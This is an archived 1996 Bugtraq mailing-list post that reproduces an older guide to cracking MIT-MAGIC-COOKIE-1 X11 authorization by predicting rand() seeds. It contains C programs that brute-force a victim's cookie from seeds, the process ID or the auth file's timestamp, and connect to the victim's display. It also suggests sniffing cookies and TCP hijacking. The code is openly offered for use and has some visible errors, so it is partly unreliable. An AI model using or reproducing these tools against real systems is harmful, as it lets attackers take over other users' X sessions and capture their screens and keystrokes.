Content-Type: TEXT/PLAIN; charset=US-ASCII
Approved-By: General Scirocco <sciri@NEWHACKCITY.NET>
Date: Thu, 1 Feb 1996 20:48:25 -0500
Reply-To: Bugtraq List <BUGTRAQ@CRIMELAB.COM>
Sender: Bugtraq List <BUGTRAQ@CRIMELAB.COM>
From: General Scirocco <sciri@newhackcity.net>
Subject: Re: bind() Security Problems
X-To: Bugtraq List <BUGTRAQ@CRIMELAB.COM>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@CRIMELAB.COM>
In-Reply-To: <199602011736.AA183746180@l-ecn046.icaen.uiowa.edu>
On Thu, 1 Feb 1996 dsiebert@icaen.uiowa.edu wrote:
> How long before someone comes up with an exploit of X that intercepts the
> incoming connections to the X server, getting around the security provided
> the magic cookie mechanism?
Can't you just sniff the plaintext cookies that are being sent across the
network? If not, wouldn't a TCP/IP hijacking attack work as well? Also,
you always have the following (which I can't take credit for, and it's
pretty old):
Cracking the MIT-MAGIC-COOKIE-1 authorization protocol.
1) Auth-data is generated from 16 successive random numbers.
MIT-MAGIC-COOKIE-1 can use 2 different methods of seeding the random
number generator:
a) Using the process ID of xdm client & time of day in seconds
b) Using the time of day in seconds & time of day in microseconds
(that connection was established).
2) Process ID/time of day in microsecs is rotated left by 16 bits and added
to the time of day in seconds:
#ifdef ITIMER_REAL
gettimeofday(&tod,&time_zone);
a=tod.tv_secs;
b=tod.tv_usecs;
#else
a=time(NULL);
b=getpid();
#endif
seed=(a+(b<<16));
srand(seed);
for(i=0;i<16;i++)
auth[i]=rand();
3) Some operating systems that use the traditional srand()/rand() functions
have a mathematical flaw inherent in them that allows a faster method
of cracking auth-data, or a brute force attack on a remote machine
to which the user has no access.
To determine if the target system's OS supports the rand() flaw, compile
and run the following src code under that operating system.
Two systems that support the flaw are SunOS4.1.x and FreeBSD.
OSF/x does _NOT_ support the flaw.
#include <stdio.h>
main() {
char auth[16];
int i;
srand(1);
for(i=0;i<16;i++)
auth[i]=rand()&0xff;
srand(257);
for(i=0;i<16;i++)
if (auth[i]!=(rand()&0xff))
exit(0);
puts("System supports flaw.");
}
4) If the program produces no output, then the OS does NOT support the flaw,
and hence the long method should be used (see step 7-)
[*] The flaw itself is that the low 8 bits of numbers produced by
successive calls to rand() repeat in the same sequence with a period
of 256. Consequently, under such Operating Systems, there are only
256 unique magic cookies that can ever be generated.
It takes little longer than a second (on the local machine) to
generate & test every one of these cookies.
5) Brute Force cracking of cookies generated using both methods
(utilising rand()'s flaw)
- The lower 8 bits of numbers produced by rand() follow a predictable
pattern, and are a function of the lower 8 bits of the seed value.
Hence, to crack the auth-data, trying auths generated with seed values
0x00-0xff will yield a matching auth-data set.
The code for such a method is as follows:
------------------------cut--------here-----------------------
#include <stdio.h>
#include <fcntl.h>
#include <sys/types.h>
#include <X11/Xlib.h>
#include <X11/Xauth.h>
char buf[256];
main(int argc, char **argv) {
long dpy;
char *ptr=(caddr_t)&dpy;
int i,j;
FILE *fd;
puts("display:");
gets(buf);
sscanf(buf,"%d.%d.%d.%d:0.0",ptr[0],ptr[1],ptr[2],ptr[3]);
cookie.family=0;
cookie.address_length=4;
cookie.address=ptr;
cookie.number_length=1;
cookie.number="0";
cookie.name_length=18;
cookie.name="MIT-MAGIC-COOKIE=1";
cookie.data_length=16;
cookie.data=auth;
chdir(getenv("HOME"));
if ((fd=fopen(".Xauthority","w"))==NULL)
{
perror("fopen");
exit(1);
}
for(i=0;i<256;i++) {
srand(i);
for (j=0;j<16;j++)
auth[j]=rand();
rewind(fd);
XauWriteAuth(fd,&cookie);
fflush(fd);
if (XOpenDisplay(buf)!==NULL) {
puts("success!");
puts("cookie added to .Xauthority");
exit(0);
}
}
fclose(fd);
unlink(".hehe");
puts("auth crack failed...");
}
--------------------------------cut-------here---------------
6) Lazy people may furthur narrow the search space by determining the time
of day (in seconds) at which the X-connection was created, and using
the lower 8 bits of that time as a seed (for an exact, one shot crack or as
a starting approximation for a seed value...).
This can be determined by intelligent means, such as fingering the user,
checking utmp logs etc etc (see step 7 for a good method)
7) Cracking cookies generated by method 'a' (on systems without the flaw)
- On operating systems such as OSF/x, the flaw is (to all intents and
purposes) has been removed by reversing the major and minor nibbles
(effectively, returning (rand()>>16) ).
[*] The low 8 bits of the upper nibble (probably) repeat, but with
a period of 2^24, making it too arduous to use brute force.
Chances are, a login session would not last long enough for the
cookie to be determined before the user logs out.
- In order to crack a user's cookie, then, it is necessary to be able
to find out the process id of the xdm handling a display (which
would require being able to do a 'ps' on the machine serving the
X-client), and to know the approximate time that the session was
started.
A good way to determine the time of day that the session was created
is to locate the file that contains the server's copy of the authority
data, and to stat the file and use the creation time (st_ctime)
as the time component of the seed.
Such files can be found in the authDir named in the xdm-config file
(/usr/lib/X11/xdm/xdm-config -- or whatever follows the '-config' arg
in xdm's command line) under DisplayManager.authDir .
[*] Note: this timestamp may be off by a second:
If the authority data is created on a second boundary, by the time
the data is written to the file (and the file is created), the
timestamp will be a second later than the actual value required.
Should the generate data fail to work, try using the file's
timestamp - 1 in the generation process.
[*] It should also be noted that sometimes auth-files from old xdm
sessions for the same display are also in the directory (ie
several authfiles for the same display).
The naming protocol for these files is something like:
A-<display name>-<xdm pid>
where the xdm pid is the number stored in the 'xdm-pid'
file in the same directory.
- A simple source (that uses the file timestamp idea outlined above)
follows:
---------------------------cut---here------------------------------
#include <stdio.h>
#include <X11/Xauth.h>
#include <sys/stat.h>
#include <sys/types.h>
main() {
Xauth cookie;
struct stat info;
char buf[256],dpy[4],auth[16],disp[25];
pid_t user_xdm;
FILE *fd;
int i,j;
time_t now;
puts("enter display (x.x.x.x:0.0)");
gets(disp);
sscanf(disp,"%d.%d.%d.%d:0.0\r",&dpy[0],&dpy[1],&dpy[2],&dpy[3]);
/* NOTE that the id prompted for here is not the pid found
in the xdm-pid file, but is the id of the session xdm process,
which usually appears in a ps -a looking something like:
-<display> (xdm)
*/
puts("enter session xdm id:");
scanf("%d\r",&user_xdm);
/* the pathname of the server's auth_file */
puts("enter FULL pathname of server's auth file");
gets(buf);
if (stat(buf,&info) {
puts("Oops, couldn't find file");
exit(1);
}
now=info.st_ctime;
cookie.family=0;
cookie.addr_length=4;
cookie.addr=dpy;
cookie.number_length=1;
cookie.number="0";
cookie.name_length=18;
cookie.name="MIT-MAGIC-COOKIE-1";
cookie.data_length=16;
cookie.data=auth;
chdir(getenv("HOME"));
if ((fd=fopen(".Xauthority","w"))==NULL)
{
perror("fopen failed");
exit(1);
}
for(i=0;i<2;i++) {
srand(now+(user_xdm<<16));
for(j=0;j<16;j++)
auth[j]=rand()&x0ff;
XauWriteAuth(fd,&cookie);
fflush(fd);
if (XOpenDisplay(disp)) {
puts("cookie added to .Xauthority");
fclose(fd);
exit(0);
}
else {
rewind(fd);
now--;
}
}
puts("Cookie not found!!!!");
exit(1);
}
----------------------------cut------------here---------------------
8) Cracking cookies generated by method b) (on systems without the flaw)
- Good luck. The time of day is easily predicted by guesswork, or by
statting the server's authfile, but the time of day in microseconds
has to be guessed. Matters are made slightly easier by the fact
that the time of day in milliseconds is left shifted by 16 bits
(tv_msec << 16), and hence is only a 16-bit factor to deal with
(iteratively trying 65536 microsecond timestamps is faster than
1,000,000).
If a user has access to the machine, it will take at most 2*65536
(accounting for the fact that the file's timestamp may be out by one
second -- see 7) == 131072 iterations. Chances are slim that a user
will stay logged on for a single session that long (console sessions
are a possibility).
9) Attribution
eris/Mr_X 10/1995
"Your information is mine for free. But everything I can grab is secret
unless you have something I want which can't be free-loaded, stolen or
found somewhere else." - George C. Smith, The Virus Creation Labs
�
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH
